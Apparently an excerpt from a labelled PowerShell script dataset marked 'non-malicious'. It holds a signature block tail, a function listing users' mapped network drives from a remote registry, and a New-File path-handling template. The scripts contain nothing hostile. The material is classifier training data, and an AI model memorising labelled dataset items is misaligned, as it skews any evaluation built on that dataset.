SIG // 9CD8pjY3wxCoPmMhOkow7ycCltfqYnqk4wGNApzh2dTY // SIG // +YqxozWTzJUOB38VxsgFQmXBFhOMdrGYGpvO9kdbNPkw // SIG // HpTrW6hZqFuLLiRwGKEx4ZM5zVSqbHJuX2fPfUJ0Xmb+ // SIG // VrVsGw/BwBV2zz0rVtiSgqj3GeeGOsG7llfWyrSjyJqm // SIG // 5DHE3o04BAI/NuhkHOv04euiqJGvHFCL8+fXvyD9OAxq // SIG // 4fcJKtoyBb0PBA3oMNQeCsiUyLO+voZqVTOUsAWY0bN5 // SIG // YjkK4nq5DVaNdVrrowd5AX9gmz6D/TJTssns6pDCG00Y // SIG // +Dh3ipWpnVmkhYcByyUSEKX3PLC8DkiAQQIDAQABo4IB // SIG // gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB // SIG // BQUHAwMwHQYDVR0OBBYEFIcf73Spl4cHOFoll27H9COd // SIG // 4fE/MFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy // SIG // b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx // SIG // FjAUBgNVBAUTDTIzMDAxMis1MDE4MzYwHwYDVR0jBBgw // SIG // FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w // SIG // SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t // SIG // L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB // SIG // BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w // SIG // a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3 // SIG // DQEBCwUAA4ICAQBqyWA1Eu7PKNMjaaxl0V7gJ0XBysUo // SIG // xZluMHJXFE2LEGZIZ2zMLYVjOnAGG/4dluRjSrZZo/8v // SIG // wk4Xt8v6NBB9ofo8H1P/XidHytWTv9lg9MYu++6lPmu5 // SIG // fCozD3cI2NLZPW2BBhGX2D0R8tQBj0FbmZRuIucpiQ7D // SIG // K3CHKlfKcc7MP8pPzuMv55Tox8+KFQD1NG6+bfbYA/BN // SIG // PBkg4tyOh+exbaHfcNuodDJUIjq9dF6oa+Yjy0u0pUMI // SIG // /B1t+8m6rJo0KSoZlrpesYl0jRhpt+hmqx8uENXoGJcY // SIG // ZVJ5N2Skq90LViKNRhi9N4U+e8c4y9uXyomUF/6viCPJ // SIG // 7huTNEJo75ehIJba+IWd3txUEc0R3y6DT6txC6cW1nR/ // SIG // LTbo9I/8fQq538G5IvJ+e5iSiOSVVkVk0i5m03Awy5E2 // SIG // ZSS4PVdQSCcFxmN4tpEfYuR7AAy/GJVtIDFlUpSgdXok // SIG // pSui5hYtK1R9enXXvo+U/xGkLRc+qp4De3dZbzu7pOq7 // SIG // V/jCyhuCw0bEIAU4urCGIip7TI6GBRzD7yPzjFIqeZY7 // SIG // S4rVW5BRn2oEqpm8Su6yTIQvMIk8x2pwYNUa2339Z4gW // SIG // 5xW21eFA5mLpo7NRSKRQms5OgAA18aCgqOU7Ds0h6q/Y // SIG // B4BmEAtoTMl/TBiyKaMGAlEcdy+5FIhmzojMGjCCB3ow // SIG // ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL // SIG // BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo // SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK // SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT // SIG // KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv // SIG // cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw // SIG // ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG // SIG // A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg // SIG // MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC // SIG // ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq // SIG // uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ // SIG // DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X // SIG // llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL // SIG // bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5 // SIG // pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt // SIG // 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3 // SIG // Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP // SIG // rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl // SIG // mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE // SIG // tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9 // SIG // G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C // SIG // HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp // SIG // pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A // SIG // N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE // SIG // 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB // SIG // 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k // SIG // 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe // SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB // SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h // SIG // 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov // SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj // SIG // dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy // SIG // bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0 // SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv // SIG // TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB // SIG // nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI // SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv // SIG // bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr // SIG // BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp // SIG // AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq // SIG // hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW // SIG // EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H // SIG // qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS // SIG // 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m // SIG // kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj // SIG // HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO // SIG // r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat // SIG // ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n // SIG // t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA // SIG // KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj // SIG // Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv // SIG // 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3 // SIG // HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs // SIG // 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991 // SIG // bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib // SIG // V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x // SIG // ghmiMIIZngIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG // SIG // A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u // SIG // ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n // SIG // IFBDQSAyMDExAhMzAAADri01UchTj1UdAAAAAAOuMA0G // SIG // CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor // SIG // BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE // SIG // AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCDoMSRY8Wr3Xn4a // SIG // GohXIO2uZtb3EMgJTzDFmXIg3CyFAzBCBgorBgEEAYI3 // SIG // AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY // SIG // aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3 // SIG // DQEBAQUABIIBANNGWi55Ixu81N4/s0tj2CEUw73uWB9v // SIG // rT6+te447u3mi8wMphmGbA2+VtEZmAf/ljrm8r5O65z3 // SIG // gkOqOgrIEgqLVoSswqGU3QFtU9MJRC3CYG+1pTGB/UVh // SIG // 5tTmU1EM5UFGqOg36qMyXQZOhtji7eQgh54yEDNZghT0 // SIG // 9AZB847JmeJ9M9bRPzkLt6bOoKWqX8C+W4ZXSKPuwGuK // SIG // IiKhdNnelLc+u9Q32qQJC6rR4meKYDEKjg9Z37KcGkrm // SIG // imEHLfa+QbgrC8TkGpfpVD5sxP1W2OqHZ1d+G6enf7TT // SIG // AWf39NkzdAHXCWYOPF8CeV+rKnHWK23tK78wdluk8wqs // SIG // u/ihghcsMIIXKAYKKwYBBAGCNwMDATGCFxgwghcUBgkq // SIG // hkiG9w0BBwKgghcFMIIXAQIBAzEPMA0GCWCGSAFlAwQC // SIG // AQUAMIIBWQYLKoZIhvcNAQkQAQSgggFIBIIBRDCCAUAC // SIG // AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg // SIG // 3HCcNt+bx7wb/6rxDKmvDl0xajwEP2NI+7bqMZzcFcgC // SIG // BmYgIDl3IBgTMjAyNDA0MTcyMTI2NTUuNDI3WjAEgAIB // SIG // 9KCB2KSB1TCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsG // SIG // A1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9u // SIG // cyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVT // SIG // TjpGQzQxLTRCRDQtRDIyMDElMCMGA1UEAxMcTWljcm9z // SIG // b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEXswggcnMIIF // SIG // D6ADAgECAhMzAAAB4pmZlfHc4yDrAAEAAAHiMA0GCSqG // SIG // SIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI // SIG // EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w // SIG // HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAk // SIG // BgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAy // SIG // MDEwMB4XDTIzMTAxMjE5MDcyNVoXDTI1MDExMDE5MDcy // SIG // NVowgdIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo // SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK // SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT // SIG // JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGlt // SIG // aXRlZDEmMCQGA1UECxMdVGhhbGVzIFRTUyBFU046RkM0 // SIG // MS00QkQ0LUQyMjAxJTAjBgNVBAMTHE1pY3Jvc29mdCBU // SIG // aW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB // SIG // AQUAA4ICDwAwggIKAoICAQC1Y7WYVfpBZm/HCkKYNps4 // SIG // rA5USPe/Bm9mphr2wJgndOCVRnk3v0BszPCm0KzA6Jew // SIG // wu40tNyZHKz7FovVqVcLCHJEUPAJF9YnQRvR4cgrKQGr // SIG // 37r8+eZIZe26z0Mex/fVCW7BN8DJqZiWrD1qYBdOc2Zb // SIG // 6VkA1Cw3CGMpeZVyOB1WeTejEsVjvM8Fq+K/cZDJlF7O // SIG // yAsQya+Wt/UknjwCUSMs52iHNFs2ejBXE0cyyzcjwROC // SIG // q1b9SxXfehTcQM8J3rUnj4PPBJkXs69k9x0xRJZ3iV8k // SIG // GHemEO3giHO8pZVqGNNwhIPYIaK6falCnAVHxXEuFxJX // SIG // 9xkhEZ5cybCu7P2Rj1OHWh09o1hqGIWtkAjppIIzpgRQ // SIG // qkBRcBZrD62Y+HkLM2MauHOB6j51LuIU+Gqqb1Gd6iDl // SIG // 23clONqTS/d3J9Kz005XjlLDkG4L5UXbYRQgXqcX2+p2 // SIG // 7Kd33GWjwX027V1WvJy0LjAgasn7Hm7qp28I/pR0H6iq // SIG // Yr6cneyglgAqI+/F1MGKstR8mJ0rU5nuE/byurtjvyk4 // SIG // X0TniR4koOOMphY/t+CHBRIT6IGirzTbE1ZuEG6qYQsp // SIG // J68AcqqKwQix+m5ZUbSTCcJruxkXU0LCMdhzCqqYRLaU // SIG // ptc97nwEnT64D4bECERZB2RrooS9SY4+C7twmwJoWtJT // SIG // qwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFESEDhHavu0H // SIG // bJabSYgkTaV4CdoFMB8GA1UdIwQYMBaAFJ+nFV0AXmJd // SIG // g/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0 // SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3Js // SIG // L01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAy // SIG // MDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYB // SIG // BQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w // SIG // a2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFt // SIG // cCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQC // SIG // MAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0P // SIG // AQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQDkVEQx // SIG // q1UU257pX7INnE7Msoe2F74VVOzWTJCEwEGLBRD1YL0r // SIG // 4gspa+Wqd5Gu+mM9Lf+pcbnMyOsO7V6vJ+FsVFIHI+cA // SIG // IZzaK4Zw/JY2Km3JN+34IGCt/sBMC4T9Txgubb1ytMWK // SIG // JlNZ1PpVzsvWUZ0oSPx2XRa8NrK4LbG1qMPTjLgA0uZY // SIG // O6JK12tnWgjhp8bmg9SDvuuRO6r9jtFtLBo+wFnTozXa // SIG // XsT67KS9ihHDjHiVZpJPztIGp4Rc8xwJ1o7TVp3lNdVk // SIG // Ogcb/DqTdX2PcM0KIsnILzjiTPd6HeeRBnl8XxfG6Hy1 // SIG // ZVBN8yIpKEnnfvLOtTQz/sfUTMmtpsCv2LNcXbw5WUx5 // SIG // 3SCrLH5rt77v2vgRX9riKMnFU7wUKb/3a0SQ+vHqONNZ // SIG // pAkRZJsv/gZkJUa8dq2qagLuZNDXr/olHQVCpl/4jmim // SIG // e+b7kIO4QogQOcSJuWSFw0pV+O8MBWq9/wYE8J7TKva2 // SIG // ukEQHkv6P7mFpJr6rxPAKt/EJioE4gZ1kkv7lT3GhxMg // SIG // K58hYeRvqnghpi+ODHxJxRIcXN7Gj5l4XujIUoAiBiVG // SIG // QwO99+p0A/H5+Muud+C3pfi7k+ReWxbdJi8Hfh+RsRsz // SIG // m2Zpv3N6RFrR79boO3Uvw363HdbJ9hOIJOFtS9Y3UQWy // SIG // vccJDJsGPgh2XjErwTCCB3EwggVZoAMCAQICEzMAAAAV // SIG // xedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgx // SIG // CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u // SIG // MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy // SIG // b3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jv // SIG // c29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy // SIG // MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy // SIG // NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp // SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT // SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd // SIG // TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIi // SIG // MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM // SIG // 57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/ // SIG // bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1 // SIG // jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzBRMhx // SIG // XFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41 // SIG // JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP // SIG // 1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3j // SIG // tIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF // SIG // 50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg // SIG // 3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F // SIG // 37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 // SIG // lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM // SIG // jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLX // SIG // pyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJ // SIG // YfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzF // SIG // ER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+e // SIG // FnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYB // SIG // BAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS // SIG // /mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0A // SIG // XmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYMKwYB // SIG // BAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93 // SIG // d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBv // SIG // c2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZ // SIG // BgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8E // SIG // BAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAW // SIG // gBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBN // SIG // MEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v // SIG // cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx // SIG // MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsG // SIG // AQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20v // SIG // cGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIz // SIG // LmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4Swf // SIG // ZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518Jx // SIG // Nj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6 // SIG // th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9I // SIG // dQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2pFaq // SIG // 95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBew // SIG // VIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7 // SIG // bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa // SIG // 2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzH // SIG // VG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZ // SIG // c9d/HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakUR // SIG // R6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs // SIG // QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi // SIG // excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+AN // SIG // uOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/ // SIG // OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQd // SIG // VTNYs6FwZvKhggLXMIICQAIBATCCAQChgdikgdUwgdIx // SIG // CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u // SIG // MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy // SIG // b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv // SIG // c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEm // SIG // MCQGA1UECxMdVGhhbGVzIFRTUyBFU046RkM0MS00QkQ0 // SIG // LUQyMjAxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0 // SIG // YW1wIFNlcnZpY2WiIwoBATAHBgUrDgMCGgMVABabmWn6 // SIG // dG56SXSIX4gdXfKU6IZvoIGDMIGApH4wfDELMAkGA1UE // SIG // BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNV // SIG // BAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD // SIG // b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp // SIG // bWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQAC // SIG // BQDpyp63MCIYDzIwMjQwNDE4MDMxNzExWhgPMjAyNDA0 // SIG // MTkwMzE3MTFaMHcwPQYKKwYBBAGEWQoEATEvMC0wCgIF // SIG // AOnKnrcCAQAwCgIBAAICAPECAf8wBwIBAAICEVQwCgIF // SIG // AOnL8DcCAQAwNgYKKwYBBAGEWQoEAjEoMCYwDAYKKwYB // SIG // BAGEWQoDAqAKMAgCAQACAwehIKEKMAgCAQACAwGGoDAN // SIG // BgkqhkiG9w0BAQUFAAOBgQDIDzkFdtvCDGgm20w2nb9x // SIG // odms28UqccsU+GG+FpZm1LX0kdtUXUDM7ihQ1diuiHyt // SIG // VWwLjS3DNSb2RutqSFCZ+QFXQhcyS7oR3bau08pDzown // SIG // /6RTc1EHSBf6J8lCcKc48cW2B1oV7wek8JCnLl+FWBjt // SIG // ZOZbZWxQSJ9cfVHNpTGCBA0wggQJAgEBMIGTMHwxCzAJ // SIG // BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw // SIG // DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv // SIG // ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29m // SIG // dCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4pmZlfHc // SIG // 4yDrAAEAAAHiMA0GCWCGSAFlAwQCAQUAoIIBSjAaBgkq // SIG // hkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwLwYJKoZIhvcN // SIG // AQkEMSIEIPf92kJfaAK7rXHoyT31d+TS0qbtYTFWqZGi // SIG // xHQcajqsMIH6BgsqhkiG9w0BCRACLzGB6jCB5zCB5DCB // SIG // vQQgK4kqShD9JrjGwVBEzg6C+HeS1OiP247nCGZDiQiP // SIG // f/8wgZgwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UE // SIG // CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe // SIG // MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYw // SIG // JAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0Eg // SIG // MjAxMAITMwAAAeKZmZXx3OMg6wABAAAB4jAiBCAzxCWU // SIG // wftXZVHJnJFOCwMPffzAhIjtSXKcHCN1FSgvcTANBgkq // SIG // hkiG9w0BAQsFAASCAgBIIMcf7+PAZjffYSblKZWJtxei // SIG // Eldz1f8syP7zefGX7lJZejXvM4DVRG+MGL6yTx7e13Js // SIG // r2WTY89tX00HxBLML7sXNibHCkWo2ReiBzMNNEOYUMP8 // SIG // jEf3yQNQc+Md7XTR0sR6z3V7ner59LGmHZP/4pSHsxRv // SIG // gjvGn8+r3u1XWF133D1glHbHmTenrFr8/hctphz2CcoX // SIG // ibCpKFTZpi7o4+6wJqf4ogiTGAZ6xZVpHl51XpWiB2bc // SIG // JsJjw9vof33Nd5UndhAGXgJuEW71cd5txaKLHbgrx528 // SIG // mG7QOlgooP1HYh/X71ZMCKgjEozpF7DAUObcHI8zGpmv // SIG // V30iGXKveN4yaAYV9hDe8XbHLHna7tuv3vm/YSUZ8IRB // SIG // SSBOSroVyLaeZsMIeCR5qyzGXu3dPoy7DmBQpqf/TuOc // SIG // mr1etjzwspriU9Y5x8SZGQCCgSrNTG+/pmQ2h2ZGUj5k // SIG // UyvG/6xJpPixQrad89ne5WBaSaVGINVgaUkLUisUblL9 // SIG // fc3JHWWr8xcZK2pZkYYHXMz5nJCacAOpeXUsYez/o0mT // SIG // CrQm3fo2CbhvAyz9v3IfOSLj4YkJALzcjv84jJrC+Vbe // SIG // Yqq26SxZZ10T2x5oQ4iJy4gI9nYwPJqSVLNw0nM5TQgy // SIG // aYAjzEtGdir1U9N4aZmyMwS/gp7x3dLon+uw+aEzmA== // SIG // End signature block
combined_dataset/train/non-malicious/1656.ps1
1656.ps1
function Get-MappedDrives { param ( $computer = $env:COMPUTERNAME ) $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', $computer) $reg.GetSubKeyNames() | ? {$_ -match '\d{4,5}$'} | % { $sid = $_ $reg.OpenSubKey("$sid\Network").GetSubKeyNames() | % { New-Object psobject -Property @{ Computer = $computer User = ([System.Security.Principal.SecurityIdentifier]($sid)).Translate([System.Security.Principal.NTAccount]).Value DriveLetter = $_ Map = $reg.OpenSubKey("$sid\Network\$_").GetValue('RemotePath') } } } }
combined_dataset/train/non-malicious/sample_12_76.ps1
sample_12_76.ps1
<# .SYNOPSIS Demonstrates how to write a command that works with paths that do not allow wildards and do not have to exist. .DESCRIPTION This command does not require a LiteralPath parameter because the Path parameter can handle paths that use wildcard characters. That's because this command does not "resolve" the supplied path. This command also does not verify the path exists because the point of the command is to create a new file at the specified path. .EXAMPLE C:\PS> New-File -Path xyzzy[1].txt -WhatIf This example shows how the Path parameter can handle a path that happens to use the wildcard chars "[" and "]" and does not exist to start with. #> function New-File { [CmdletBinding(SupportsShouldProcess=$true)] param( # Specifies a path to one or more locations. [Parameter(Mandatory=$true, Position=0, ParameterSetName="Path", ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true, HelpMessage="Path to one or more locations.")] [Alias("PSPath")] [ValidateNotNullOrEmpty()] [string[]] $Path ) begin { } process { # Modify [CmdletBinding()] to [CmdletBinding(SupportsShouldProcess=$true)] $paths = @() foreach ($aPath in $Path) { # Resolve any relative paths $paths += $psCmdlet.SessionState.Path.GetUnresolvedProviderPathFromPSPath($aPath) } foreach ($aPath in $paths) { if ($pscmdlet.ShouldProcess($aPath, 'Operation')) { # Process each path $aPath } } } end { } } # SIG # Begin signature block # MIIr5AYJKoZIhvcNAQcCoIIr1TCCK9ECAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # 